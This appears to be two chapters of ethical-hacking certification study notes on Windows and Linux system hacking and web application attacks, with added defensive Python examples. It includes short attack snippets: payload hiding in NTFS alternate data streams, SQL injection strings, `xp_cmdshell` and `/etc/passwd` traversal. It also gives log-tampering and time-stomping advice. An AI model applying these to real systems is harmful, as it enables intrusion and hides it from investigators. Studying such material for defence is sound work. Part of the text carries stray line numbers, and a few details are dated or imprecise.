--------------------------------------------------------------------------------

# 05-System Hacking

## Table of Contents

- [System Hacking](05-system_hacking.md#system-hacking)
  - [Windows Security Architecture](05-system_hacking.md#windows-security-architecture)
    - [LM Hashing](05-system_hacking.md#lm-hashing)
    - [Ntds.dit](05-system_hacking.md#ntdsdit)
    - [Kerberos](05-system_hacking.md#kerberos)
    - [Registry](05-system_hacking.md#registry)
      - [Root Level Keys](05-system_hacking.md#root-level-keys)
      - [Types of Registry Values](05-system_hacking.md#types-of-registry-values)
      - [Important Locations](05-system_hacking.md#important-locations)
      - [Executables](05-system_hacking.md#executables)
    - [MMC \(Microsoft Management Console\)](05-system_hacking.md#mmc-microsoft-management-console)
    - [Null session](05-system_hacking.md#null-session)
  - [Linux Security Architecture](05-system_hacking.md#linux-security-architecture)
    - [Important Directories](05-system_hacking.md#important-directories)
    - [Important Linux Commands](05-system_hacking.md#important-linux-commands)
  - [System Hacking Goals](05-system_hacking.md#system-hacking-goals)
  - [Authentication and Password](05-system_hacking.md#authentication-and-password)
    - [Three Types of Authentication](05-system_hacking.md#three-types-of-authentication)
    - [Types of Password Attacks](05-system_hacking.md#types-of-password-attacks)
      - [Non-electronic](05-system_hacking.md#non-electronic)
      - [Active online](05-system_hacking.md#active-online)
      - [Passive online](05-system_hacking.md#passive-online)
      - [Offline](05-system_hacking.md#offline)
  - [Privilege Escalation](05-system_hacking.md#privilege-escalation)
    - [Types of Privilege Escalation](05-system_hacking.md#types-of-privilege-escalation)
    - [Four Methods](05-system_hacking.md#four-methods)
  - [Executing Applications](05-system_hacking.md#executing-applications)
  - [Hiding Files](05-system_hacking.md#hiding-files)
    - [ADS \(Alternate Data Stream\)](05-system_hacking.md#ads-alternate-data-stream)
    - [Attribute](05-system_hacking.md#attribute)
    - [Steganography](05-system_hacking.md#steganography)
    - [Rootkit](05-system_hacking.md#rootkit)
      - [Types of Rootkits](05-system_hacking.md#types-of-rootkits)
  - [Covering Tracks](05-system_hacking.md#covering-tracks)

## System Hacking

### Windows Security Architecture

- Authentication credentials are stored in the SAM file
- Older systems use LM hashing.
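Added example for the SID/RID, SAM-line and LM Hashing material of this section (it is not code from the notes). It parses the `UserName:SID:LM_Hash:NTLM_Hash:::` layout the notes give, performs the LM key-expansion step the LM Hashing section describes (7 bytes to a DES key with a null bit after every 7 bits), and uses the blank-half constant `AAD3B435B51404EE` from the notes to flag accounts whose LM hash is still stored and whose password is 7 characters or shorter. The numeric second field is treated as the RID (500, 1000, ...), which is what pwdump-style output carries; the sample lines and their hash values are constructed placeholders.

```python
"""Added example (not from the notes): SID, SAM-line and LM hash checks.

All sample data is constructed; the hash values are placeholders."""
from __future__ import annotations

from dataclasses import dataclass

BLANK_LM_HALF = "AAD3B435B51404EE"  # LM ciphertext of an empty 7-byte half (from the notes)
ADMIN_RID = 500                     # built-in Administrator (from the notes)
FIRST_USER_RID = 1000               # regular accounts start here (from the notes)


def rid_of(sid: str) -> int:
    """Return the RID: the last sub-authority of a SID such as S-1-5-21-...-500."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError(f"not a SID: {sid!r}")
    return int(parts[-1])


def lm_halves(password: str) -> tuple[bytes, bytes]:
    """LM steps 1-2: uppercase, cut to 14 chars, NUL-pad, split into two 7-byte halves."""
    raw = password.upper().encode("ascii")[:14].ljust(14, b"\x00")
    return raw[:7], raw[7:]


def expand_des_key(half: bytes) -> bytes:
    """LM step 3: 7 bytes (56 bits, MSB first) -> 8-byte DES key by inserting a
    null bit after every 7 bits, e.g. 1010100 becomes 10101000."""
    if len(half) != 7:
        raise ValueError("LM key half must be 7 bytes")
    bits = int.from_bytes(half, "big")          # 56-bit integer
    key = 0
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F   # next 7 bits, MSB first
        key = (key << 8) | (seven << 1)         # append the null (parity) bit
    return key.to_bytes(8, "big")


@dataclass
class SamEntry:
    user: str
    rid: int       # the notes label this field SID; pwdump output carries the RID
    lm_hash: str
    nt_hash: str


def parse_sam_line(line: str) -> SamEntry:
    """Parse 'UserName:RID:LM_Hash:NTLM_Hash:::' (layout from the notes)."""
    fields = line.strip().split(":")
    if len(fields) < 4:
        raise ValueError(f"malformed SAM line: {line!r}")
    return SamEntry(fields[0], int(fields[1]), fields[2].upper(), fields[3].upper())


def audit_sam(lines: list[str]) -> dict[str, list[str]]:
    """Defender-side findings per account, keyed by user name."""
    findings: dict[str, list[str]] = {}
    for line in lines:
        if not line.strip():
            continue
        e = parse_sam_line(line)
        notes: list[str] = []
        if e.lm_hash != BLANK_LM_HALF * 2:
            notes.append("LM hash stored (disable LM hashes)")
            if e.lm_hash[16:] == BLANK_LM_HALF:     # second half is the blank constant
                notes.append("password is 7 chars or shorter")
        if e.rid == ADMIN_RID and e.user.lower() != "administrator":
            notes.append("built-in Administrator renamed (RID 500)")
        if e.rid >= FIRST_USER_RID:
            notes.append("regular account")
        findings[e.user] = notes
    return findings


# Constructed sample in the notes' layout; hashes are placeholders, not real hashes.
SAMPLE_SAM = [
    "Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:00000000000000000000000000000001:::",
    "bob:1001:0123456789ABCDEFAAD3B435B51404EE:00000000000000000000000000000002:::",
    "svc_backup:1002:0123456789ABCDEFFEDCBA9876543210:00000000000000000000000000000003:::",
]

if __name__ == "__main__":
    print(rid_of("S-1-5-21-3874928736-367528774-1298337465-500"))
    print(expand_des_key(lm_halves("password")[0]).hex())
    for user, notes in audit_sam(SAMPLE_SAM).items():
        print(user, notes)
```

The DES encryption of `KGS!@#$%` itself is left out because the standard library has no DES; the key-expansion step is the part the notes spell out, and the blank-half check works on the stored hash alone.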
- Current systems use NTLM v2 \(MD5\)
- Windows network authentication uses Kerberos
- **Security Context**: user identity and authentication information
- **Security Identifier** \(SID\): identifies a user, group or computer account
- **Relative Identifier** \(RID\): portion of the SID that identifies a specific user, group or computer
  - The end of the SID indicates the user number
  - Example SID: S-1-5-21-3874928736-367528774-1298337465-**500**
  - **Administrator Account**: SID ending in 500
  - **Regular Accounts**: SIDs start at 1000
- **SAM Database** \(Security Account Manager\)
  - File stores encrypted local passwords
  - Location: `C:\Windows\System32\Config`

#### LM Hashing

- Password is restricted to a maximum of 14 characters and converted to uppercase
- The "fixed-length" password is split into two 7-byte halves
- These values are used to create two DES keys, one from each 7-byte half, by converting the seven bytes into a bit stream with the most significant bit first, and inserting a null bit after every seven bits \(so 1010100 becomes 10101000\). This generates the 64 bits needed for a DES key
- Each of the two keys is used to DES-encrypt the constant ASCII string `KGS!@#$%`, resulting in two 8-byte ciphertext values
- Blank section hash: `AAD3B435B51404EE`
- SAM file presents as `UserName:SID:LM_Hash:NTLM_Hash:::`

#### Ntds.dit

- Database file on a domain controller that stores passwords
- Includes the entire Active Directory
- Location: `%SystemRoot%\NTDS\Ntds.dit` or `%SystemRoot%\System32\Ntds.dit`

#### Kerberos

- Uses both symmetric and asymmetric encryption
- Steps of exchange:
  1. Client asks the **Key Distribution Center** \(KDC\) for a ticket. The user ID is sent in cleartext to the **Authentication Server** \(AS\) \(neither the secret key nor the password is sent to the AS\)
  2. Server responds with a **Ticket Granting Ticket** \(TGT\). This is a secret key which is hashed by the password copy stored on the server
  3. If the client can decrypt it, the TGT is sent back to the server requesting a **Ticket Granting Service** \(TGS\) service ticket
  4. Server sends the TGS service ticket, which the client uses to access resources
- Tools: both take a long time to crack
  - KerbSniff
  - KerbCrack

#### Registry

- Collection of all the settings and configurations that make the system run
- Made up of keys and values

##### Root Level Keys

- **HKEY_LOCAL_MACHINE** \(HKLM\): information on hardware and software
- **HKEY_CLASSES_ROOT** \(HKCR\): information on file associations and OLE classes
- **HKEY_CURRENT_USER** \(HKCU\): profile information for the current user including preferences
- **HKEY_USERS** \(HKU\): specific user configuration information for all currently active users
- **HKEY_CURRENT_CONFIG** \(HKCC\): pointer to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current`

##### Types of Registry Values

- **REG_SZ**: character string
- **REG_EXPAND_SZ**: expandable string value
- **REG_BINARY**: a binary value
- **REG_DWORD**: 32-bit unsigned integer
- **REG_LINK**: symbolic link to another key

##### Important Locations

- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce`
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices`
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce`
- `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run` \(runs an app as soon as the user logs in\)

##### Executables

- regedit.exe
- regedt32.exe \(preferred by Microsoft\)

#### MMC \(Microsoft Management Console\)

- Used by Windows to administer the system
- "Snap-ins" allow you to modify settings, such as the Group Policy Editor

#### Null session

- Anonymous connection to an inter-process communication \(IPC\) network service
- NetBIOS is vulnerable to it
- **Countermeasure**: create the `RestrictAnonymous` registry key

### Linux Security Architecture

- Linux systems use User IDs \(UID\) and Group IDs \(GID\), found in `/etc/passwd`
- Root has a UID and GID of 0
- First user has a UID and GID of 500
- Passwords are stored in `/etc/shadow` on most current systems
  - `/etc/passwd` stores passwords as hashes
  - `/etc/shadow` stores passwords encrypted \(hashed and salted\) and is only accessible by root

#### Important Directories

| Directory | Description |
| :-------- | :---------- |
| / | Root directory |
| /home | Holds the user home directories |
| /etc | All administration files and passwords. Both passwd and shadow files are here |
| /usr | Holds almost all the information, commands and files unique to the users |
| /mnt | Holds the access locations you've mounted |
| /bin | Basic Linux commands |
| /sbin | System binaries folder which holds more administrative commands |
| /dev | Contains pointer locations to various storage and input/output systems |

#### Important Linux Commands

| Command | Description |
| :------- | :---------- |
| adduser | Add a user to the system |
| cat | Display contents of a file |
| cp | Copy |
| ifconfig | Display network configuration information |
| kill | Kill a running process |
| ls | Display the contents of a folder. `-l` option provides the most information |
| man | Display the manual page for a command |
| passwd | Used to change a password |
| ps | Process status. `-ef` option shows all processes |
| rm | Remove files. `-r` option recursively removes all subdirectories |
| su | Allows you to perform functions as another user \(super user\) |
| pwd | Display the current directory |
| chmod | Change permissions of a folder or file |
| | `Read` 4 \(100\), `Write` 2 \(010\), `Execute` 1 \(001\) |
| | `777`: the three 7s in order stand for `user`, `group` and `others`; the result is `rwxrwxrwx` |

- Adding an ampersand `&` after a process name indicates it should run in the background
- Linux Enumeration Commands
  - **finger**: info on user and host machine
  - **rpcinfo and rpcclient**: info on RPC in the environment
  - **showmount**: displays all shared directories on the machine

### System Hacking Goals

- **Gaining Access**: using information gathered to exploit the system
- **Escalating Privileges**: granting the hacked account admin rights, or pivoting to an admin account
- **Executing Applications**: putting back doors into the system to maintain access
- **Hiding Files**: making sure the files left behind are not discoverable
- **Covering Tracks**: cleaning up everything else \(log files, etc.\)

### Authentication and Password

- **Strength of passwords**
  - Determined by length and complexity
  - Complexity is defined by the number of character sets used \(lower case, upper case, numbers, symbols, etc.\)
- **Default passwords**
  - Should always be changed; never leave what they came with
  - Sites such as cirt.net, default-password.info and open-sez.me all have databases of these

#### Three Types of Authentication

- **Something You Are**
  - **Active**: interaction required \(retina scan or fingerprint scanner\)
  - **Passive**: no interaction required \(iris scan\)
  - Uses biometrics to validate identity \(retina, fingerprint, etc.\); downside: a lot of false negatives
  - **False acceptance rate** \(FAR\): rate at which a system accepts access for people that shouldn't have it
  - **False rejection rate** \(FRR\): rate at which a system rejects access for someone who should have it
  - **Crossover error rate** \(CER\): combination of the two; the lower the CER, the better the system
- **Something You Have**
  - Usually consists of a token of some kind \(swipe badge, ATM card, etc.\)
  - This type usually requires something alongside it \(such as a PIN for an ATM card\)
  - Some tokens are single-factor \(such as plug-and-play authentication\)
- **Something You Know**: better known as a password
- **2FA** \(Two-Factor Authentication\): when you have two types of authentication, such as something you know \(password\) and something you have \(access card\)

#### Types of Password Attacks

##### Non-electronic

- Social engineering attacks; the most effective

##### Active online

- Done by directly communicating with the victim's machine
- Active online attacks are easier to detect and take a longer time
- Including dictionary and brute-force attacks, hash injection, phishing, Trojans, spyware, keyloggers and password guessing
- **Keylogging**: process of using a hardware device or software application to capture the keystrokes of a user
- **LLMNR/NBT-NS**
  - Attack based on Windows technologies that cache DNS locally
  - A host responding to these poisoned name lookups sends over an NTLM v2 hash, which can be sniffed out and then cracked
  - Tools
    - NBNSpoof
    - Metasploit
    - Responder
- Can combine `net` commands with a tool such as **NetBIOS Auditing Tool** or **Legion** to automate the testing of user IDs and passwords
- Tools
  - Hydra
  - Metasploit

##### Passive online

- Sniffing the wire in hopes of intercepting a password in clear text, or attempting a replay attack or man-in-the-middle attack
- Tools
  - Cain and Abel: can poison ARP and then monitor the victim's traffic
  - Ettercap: works very similarly to Cain and Abel; however, it can also help against SSL encryption

##### Offline

- When the hacker steals a copy of the password file and does the cracking on a separate system
- **Dictionary Attack**: using a word list to attack the password; the fastest method of attacking
- **Brute force Attack**
  - Tries every combination of characters to crack a password
  - Can be faster if you know parameters \(such as at least 7 characters, should have a special character, etc.\)
- **Rule-based Attack**: attacker obtains some information about the password
- **Hybrid Attack**: taking a dictionary attack and replacing characters \(such as a 0 for an o\) or adding numbers to the end
- **Syllable Attack**: when passwords are not known words, attackers use the dictionary and other methods to crack them, as well as all possible combinations of them
- **Rainbow tables**: using pre-hashed passwords to compare against a password hash. Faster because the hashes are already computed
- **Distributed Network Attack** \(DNA\): recovering password-protected files using the unused processing power of machines across the network to decrypt passwords
- Tools
  - Cain
  - John the Ripper

### Privilege Escalation

#### Types of Privilege Escalation

- **Vertical**: lower-level user executes code at a higher privilege level
- **Horizontal**: executing code at the same user level but from a location that would be protected from that access

#### Four Methods

1. Crack the password of an admin, the primary aim
2. Take advantage of an OS vulnerability
   - **DLL Hijacking**: replacing a DLL in the application directory with your own version, which gives you the access you need
3. Use a tool that will provide you the access, such as Metasploit
4. Social engineer a user into running an application

### Executing Applications

- Executing things such as keyloggers, spyware, back doors and crackers
- EC-Council \(ECC\) refers to executing applications as "owning" a system

### Hiding Files

#### ADS \(Alternate Data Stream\)

- Works only on Windows
- Hides a file from the directory listing on an NTFS file system
- Can be run by `start readme.txt:badfile.exe`
- Can also create a link to this and make it look real: `mklink innocent.exe readme.txt:badfile.exe`
- **Countermeasures**
  - Show ADS: `dir /r`
  - Blow away all ADS by copying files to a FAT partition
  - Every forensic kit looks for this

#### Attribute

- In Windows: `attrib +h filename`
- In Linux: simply add a dot `.` to the beginning of the filename

#### Steganography

- Steganography can hide data and files; more details in `./11-Cryptography.md`

#### Rootkit

- Software put in place by an attacker to obscure system compromise
- Hides processes and files
- Also allows for future access
- Examples:
  - Horsepill: Linux kernel rootkit inside initrd
  - Grayfish: Windows rootkit that injects into the boot record
  - Azazel
  - Avatar
  - Necurs
  - ZeroAccess
- One way to detect rootkits is to map all the files on a system, then boot the system from a clean CD version and compare the two file systems

##### Types of Rootkits

- **Hypervisor level**: rootkits that modify the boot sequence of a host system to load a VM as the host OS
- **Hardware level**: hiding malware in devices or firmware
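Added example for the rootkit detection method in the Rootkit section above (mapping all files, then comparing against a map taken from a clean boot); it is not code from the notes. `map_files` builds a path-to-SHA-256 manifest of a tree and `compare_maps` reports files the live system hides, files added, and files whose content changed. The `demo` function is a constructed scenario built in a temporary directory: the "live" tree stands in for the running, possibly rootkitted system, the "clean" tree for the same disk seen from clean media, with one hidden module and one trojaned binary planted for the comparison.

```python
"""Added example (not from the notes): detect rootkit tampering by comparing
a file map taken on the live system with one taken from a clean boot.
The demo trees, file names and contents are constructed for the example."""
from __future__ import annotations

import hashlib
import os
import tempfile


def map_files(root: str) -> dict[str, str]:
    """Walk root and return {relative path: sha256 of content}."""
    manifest: dict[str, str] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()                       # deterministic traversal order
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue                      # hash real files only, not links
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 16), b""):
                    h.update(chunk)
            manifest[os.path.relpath(full, root)] = h.hexdigest()
    return manifest


def compare_maps(live: dict[str, str], clean: dict[str, str]) -> dict[str, list[str]]:
    """Differences between the live system's view and the clean-boot view.

    hidden   = on disk (clean view) but absent from the live listing: the
               signature of a rootkit hiding files
    added    = in the live listing but not on the clean map (e.g. a dropper
               removed before the clean boot)
    modified = same path, different content (trojaned binary)
    """
    live_paths, clean_paths = set(live), set(clean)
    return {
        "hidden": sorted(clean_paths - live_paths),
        "added": sorted(live_paths - clean_paths),
        "modified": sorted(p for p in live_paths & clean_paths if live[p] != clean[p]),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: rootkit hides lib/.rk.ko from the live listing and
    has replaced bin/ls; the clean boot sees the real disk contents."""
    with tempfile.TemporaryDirectory() as tmp:
        clean_root = os.path.join(tmp, "clean")
        live_root = os.path.join(tmp, "live")
        files = {"bin/ls": b"ls v1", "etc/passwd": b"root:x:0:0", "lib/libc.so": b"libc"}
        for root in (clean_root, live_root):
            for rel, data in files.items():
                path = os.path.join(root, rel)
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "wb") as f:
                    f.write(data)
        # The clean boot sees the rootkit module; the live (hooked) listing does not.
        with open(os.path.join(clean_root, "lib", ".rk.ko"), "wb") as f:
            f.write(b"rootkit module")
        # The live system's ls binary has been replaced with a backdoored copy.
        with open(os.path.join(live_root, "bin", "ls"), "wb") as f:
            f.write(b"ls v1 + backdoor")
        return compare_maps(map_files(live_root), map_files(clean_root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9} {paths}")
```

On a real host the live map is taken with the system running and the clean map after booting from trusted media with the disk mounted read-only; any difference in `hidden` or `modified` under system directories is what to investigate first.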
- **Boot loader level**: replacing the boot loader with one controlled by the hacker
- **Application level**: directed to replace valid application files with Trojans
- **Kernel level**: attacking boot sectors \(MBR: Master Boot Record\) and the kernel, replacing kernel code with back-door code; most dangerous
- **Library level**: using system-level calls to hide themselves

### Covering Tracks

- Don't just delete logs; that is a key sign that an attack has happened. One option is to corrupt a log file, because this can happen all the time
- The best option is to be selective and delete only the entries pertaining to your actions
- Also disable auditing ahead of time to prevent logs from being captured
- In Windows: need to clear the application, system and security logs; the tool Elsave can clear Windows logs
- In Windows: clear the MRU \(Most Recently Used\) list
- **clearev**: Meterpreter shell command to clear log files
- **Time stomping**: manipulating time stamps on files; used to set file times in order to throw off investigations of an intrusion

--------------------------------------------------------------------------------
/06-web_server_and_web_application_hacking.md:
--------------------------------------------------------------------------------

# 06-Web Server and Web Application Hacking

## Table of Contents

- [Web Server and Web Application Hacking](06-web_server_and_web_application_hacking.md#web-server-and-web-application-hacking)
  - [Web Organizations](06-web_server_and_web_application_hacking.md#web-organizations)
  - [OWASP Web Top 10 Application Security Risks 2017](06-web_server_and_web_application_hacking.md#owasp-web-top-10-application-security-risks-2017)
  - [Web Server Architecture](06-web_server_and_web_application_hacking.md#web-server-architecture)
    - [Technology Stacks](06-web_server_and_web_application_hacking.md#technology-stacks)
  - [Web Server Attack Methodology](06-web_server_and_web_application_hacking.md#web-server-attack-methodology)
  - [Web Server and Application Attacks](06-web_server_and_web_application_hacking.md#web-server-and-application-attacks)
    - [Injections](06-web_server_and_web_application_hacking.md#injections)
      - [File Injection](06-web_server_and_web_application_hacking.md#file-injection)
      - [Command Injection](06-web_server_and_web_application_hacking.md#command-injection)
      - [LDAP Injection](06-web_server_and_web_application_hacking.md#ldap-injection)
      - [SOAP Injection](06-web_server_and_web_application_hacking.md#soap-injection)
      - [SQL Injection](06-web_server_and_web_application_hacking.md#sql-injection)
    - [XSS \(Cross-site scripting\)](06-web_server_and_web_application_hacking.md#xss-cross-site-scripting)
    - [CSRF \(Cross-Site Request Forgery\)](06-web_server_and_web_application_hacking.md#csrf-cross-site-request-forgery)
    - [Clickjacking](06-web_server_and_web_application_hacking.md#clickjacking)
    - [Buffer Overflow \(Smashing the stack\)](06-web_server_and_web_application_hacking.md#buffer-overflow-smashing-the-stack)
    - [Other attacks](06-web_server_and_web_application_hacking.md#other-attacks)

## Web Server and Web Application Hacking

### Web Organizations

- **Web 2.0**: dynamic applications; have a larger attack surface due to simultaneous communication
- **Internet Engineering Task Force** \(IETF\): creates engineering documents to help make the Internet work better
- **World Wide Web Consortium** \(W3C\): a standards-developing community
- **Open Web Application Security Project** \(OWASP\): an organization focused on improving the security of software
- **WebGoat**: project maintained by OWASP; an insecure web application meant to be tested

### OWASP Web Top 10 Application Security Risks 2017

- **A1 Injection Flaws**: SQL, OS and LDAP injection
- **A2 Broken Authentication and Session Management**: functions related to authentication and session management that aren't implemented correctly
- **A3 Sensitive Data Exposure**: not properly protecting sensitive data \(SSN, CC numbers, etc.\)
- **A4 XML External Entities \(XXE\)**: exploiting XML processors by uploading hostile content in an XML document
- **A5 Broken Access Control**: having improper controls on areas that should be protected
- **A6 Security Misconfiguration**: across all parts of the server and application
- **A7 Cross-Site Scripting \(XSS\)**: taking untrusted data and sending it without input validation
- **A8 Insecure Deserialization**: improperly de-serializing data
- **A9 Using Components with Known Vulnerabilities**: libraries and frameworks that have known security holes
- **A10 Insufficient Logging and Monitoring**: not having enough logging to detect attacks

### Web Server Architecture

- **Most Popular Servers**: Apache, IIS and Nginx
  - Apache runs configurations as a part of a module within special files \(httpd.conf, etc.\)
  - IIS runs all applications in the context of LOCAL_SYSTEM
  - IIS 5 had a ton of bugs; easy to get into
- **N-Tier Architecture**: distributing processes across multiple servers; normally three-tier: Presentation \(web\), logic \(application\) and data \(database\)
- **Error Reporting**: should not show errors in production; easy to glean information
- **HTML**: markup language used to display web pages
- **HTTP Request Methods**
  - **GET**: retrieving whatever information is in the URL; data is sent in the URL
  - **HEAD**: identical to GET except that no body is returned
  - **POST**: sending data via the body; data not shown in the URL or in history
  - **PUT**: requesting that data be stored at the URL
  - **DELETE**: requesting that the origin server delete the resource
  - **TRACE**: requesting an application-layer loopback of the message
  - **CONNECT**: reserved for use with a proxy
- **HTTP Error Messages**
  - **1xx: Informational**: request received, continuing
  - **2xx: Success**: action received, understood and accepted
  - **3xx: Redirection**: further action must be taken
  - **4xx: Client Error**: request contains bad syntax or cannot be fulfilled
  - **5xx: Server Error**: server failed to fulfill an apparently valid request

#### Technology Stacks

| Stack Layer | Service | Technique |
| :---------- | :------ | :-------- |
| 7 | Custom Web Applications | Business Logic |
| 6 | Third Party Components | Open Source/Commercial |
| 5 | Web Server | Apache/MS IIS |
| 4 | Database | Oracle/MySQL/MS SQL |
| 3 | Operating System | Windows/Linux/OS X |
| 2 | Network | Router/Switch |
| 1 | Security | IPS/IDS |

### Web Server Attack Methodology

- **Information Gathering**: Internet searches, whois, reviewing robots.txt
- **Web Server Footprinting**: banner grabbing
  - nmap
    - Detect vulnerable TRACE method: `nmap --script http-trace -p80 localhost`
    - List email addresses: `nmap --script http-google-email `
    - Discover virtual hosts on the same IP address you're footprinting; `*` is an online db such as IP2Hosts: `nmap --script hostmap-* `
    - Enumerate common web apps: `nmap --script http-enum -p80 `
    - Grab robots.txt: `nmap -p80 --script http-robots.txt `
    - Find out what options are supported by an HTTP server: `nmap --script http-methods `
  - Other tools
    - Netcraft
    - HTTPRecon
    - ID Serve
    - HTTPrint
- **Website Mirroring**
  - Bringing the site to your own machine to examine structure, etc.
  - Tools
    - Wget
    - BlackWidow
    - HTTrack
    - WebCopier
    - SurfOffline
- **Vulnerability Scanning**
  - Scanning the web server for vulnerabilities
  - Tools
    - Nessus
    - Nikto: specifically suited for web servers; still very noisy like Nessus; scans files and vulnerable CGIs
- **Session Hijacking**
- **Web Server Password Cracking**

### Web Server and Application Attacks

- Most often hacked because of inherent weaknesses built into the program
- First step is to identify entry points \(POST data, URL parameters, cookies, headers, etc.\)
- Tools
  - WebScarab: provided by OWASP
  - Burp Suite
  - httprint
- **Cookies**
  - Small text-based files stored that contain information like preferences, session details or shopping cart contents
  - Can be manipulated to change functionality \(e.g. changing a cookie that says "ADMIN=no" to "yes"\)
  - Sometimes, but rarely, can also contain passwords
- **DNS Amplification**: uses recursive DNS to DoS a target; amplifies DNS answers to the target until it can't do anything
- **Directory Traversal** \(../ or dot-dot-slash\)
  - Example: `http://www.example.com/../../../../etc/passwd`
  - File requested that should not be accessible from the web server
  - Using Unicode/URL encoding to possibly evade IDS: `%2e` for dot and `%2f` for slash
- **Parameter Tampering** \(URL Tampering\): manipulating parameters within the URL to achieve escalation or other changes
- **Hidden Field Tampering**: modifying hidden form fields, producing unintended results
- **Web Cache Poisoning**: replacing the cache on a box with a malicious version of it
- **Wfetch**: Microsoft tool that allows you to craft HTTP requests to see response data
- **Misconfiguration Attack**: improper configuration of a web server
- **Password Attack**: attempting to crack passwords related to web resources
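Added example for the Directory Traversal item in the list above (the `../` and `%2e`/`%2f` forms); it is not code from the notes. `resolve_under_root` fully percent-decodes the requested path, rejects NUL and backslash tricks, normalises it under the document root and refuses anything that climbs out. The document root `/var/www/html` is a hypothetical name and the request list is constructed: the notes' own traversal example, its encoded and double-encoded variants, and two benign requests.

```python
"""Added example (not from the notes): containing a requested path inside the
web root so ../ and percent-encoded variants cannot reach /etc/passwd.
WEB_ROOT and SAMPLE_REQUESTS are constructed for the example."""
from __future__ import annotations

import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # hypothetical document root


def decode_fully(path: str, rounds: int = 3) -> str:
    """Undo percent-encoding until it stops changing (catches %252e double encoding)."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            return decoded
        path = decoded
    return path


def resolve_under_root(requested: str, root: str = WEB_ROOT) -> str | None:
    """Return the absolute path to serve, or None if the request escapes root."""
    decoded = decode_fully(requested)
    if "\x00" in decoded or "\\" in decoded:
        return None                          # NUL truncation / backslash separators
    # Join below the root and collapse '.' and '..' segments as POSIX path rules do.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None                          # climbed above the document root
    return candidate


# Constructed requests: the notes' example, encoded variants, and benign ones.
SAMPLE_REQUESTS = [
    "/index.html",
    "/images/../css/site.css",
    "/../../../../etc/passwd",
    "/%2e%2e/%2e%2e/etc/passwd",
    "/..%2f..%2fetc/passwd",
    "/%252e%252e/etc/passwd",
    "/docs/report.pdf%00.html",
]


def classify(requests: list[str]) -> dict[str, str | None]:
    """Map each request to the path that would be served, or None when refused."""
    return {r: resolve_under_root(r) for r in requests}


if __name__ == "__main__":
    for req, served in classify(SAMPLE_REQUESTS).items():
        print(f"{req:32} -> {served if served else 'REFUSED'}")
```

This works on the path string alone so it runs offline; a real file server should additionally resolve the final candidate with `os.path.realpath` and re-check the prefix, so a symlink inside the root cannot point outside it.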
138 | - **Connection String Parameter Pollution**: injection attack that uses semicolons to take advantage of databases that use this separation method 139 | - **Web Defacement**: simply modifying a web page to say something else 140 | - **Shellshock** 141 | - Causes Bash to unintentionally executing commands when commands are concatenated on the end of function definitions 142 | - RCE via Apache CGI Script 143 | - Tools 144 | - Brutus: brute force web passwords of HTTP 145 | - Hydra: network login cracker 146 | - Metasploit 147 | - Exploits hold the actual exploit 148 | - Payload contains the arbitrary code if exploit is successful 149 | - Auxiliary used for one-off actions \(like a scan\) 150 | - NOPS used for buffer-overflow type operations 151 | 152 | #### Injections 153 | 154 | ##### File Injection 155 | 156 | - Attacker injects a pointer in a web form to an exploit hosted elsewhere 157 | 158 | ##### Command Injection 159 | 160 | - Attacker gains shell access using Java or similar 161 | 162 | ##### LDAP Injection 163 | 164 | - Attacker exploits applications that construct LDAP statements 165 | - Format for LDAP injection including `)(&)` 166 | 167 | ##### SOAP Injection 168 | 169 | - Injecting query strings in order to bypass authentication 170 | - Using XML to format information 171 | - Messages are one way in nature 172 | 173 | ##### SQL Injection 174 | 175 | - Injecting SQL commands into input fields to produce output 176 | - Double dash \(--\) tells the server to ignore the rest of the query: `' OR 1 = 1 --`, basically tells the server if 1 = 1 \(always true\) 177 | - Basic test to see if SQL injection is possible is just inserting a single quote `'` 178 | - **In-band SQL injection**: using same communication channel to perform attack 179 | 180 | - **Error-based SQL Injection**: most common used, inserting bad input to get database-level error message 181 | - System stored procedure 182 | - Illegal/Logically incorrect query: `SELECT * FROM users WHERE 
name='bob"' AND password =`, gets `'Unclosed quotation mark after sting " AND password='xxx"."`
- **UNION SQL Injection**: most commonly used; uses the `UNION` clause to append a malicious query
- **Tautology**: using always-true statements to test SQL \(e.g. 1=1\)
- **End of Line Comment**: writing a line of code that ends in the comment marker `--`

  `SELECT * FROM users WHERE name='admin'--' AND password = 'password'`

- **Inline Comment**: using the in-line comment `/* */`
- **Piggybacked Query**: using a semicolon `;` to add a malicious query after the original query
- **Out-of-band SQL injection**: using different communication channels \(e.g. exporting results to a file on the web server\)
- **Blind/inferential SQL injection**: no error messages or screen output are returned, so the attacker usually has to guess whether a command worked, or use timing to tell
  - Time delay: inserting a wait function to cause a delay
  - Boolean exploitation: manipulating valid statements that evaluate to true or false in an HTTP request parameter
    - `https://example.com/item.aspx?id=67 and 1=2` gets SQL query `SELECT * FROM items WHERE ID=67 AND 1=2`; if vulnerable to SQL injection, no item will show
    - `https://example.com/item.aspx?id=67 and 1=1` gets SQL query `SELECT * FROM items WHERE ID=67 AND 1=1`; if vulnerable to SQL injection, item 67 will show
  - Heavy query: when it's impossible to use a time delay function in the query, generate heavy queries instead
- **MS SQL Server injection**: running commands from a SQL shell by using `xp_cmdshell`
- **Countermeasures**
  - To counter **Database server runs OS commands**
    - Running the database service account with minimal rights
    - Disabling commands like `xp_cmdshell`
  - To counter **Using privileged account to connect to database**
    - Monitoring DB traffic using an IDS, WAF
    - Using a low-privileged account for the DB connection
  - To counter **Error message revealing important information**
    - Suppressing all error messages
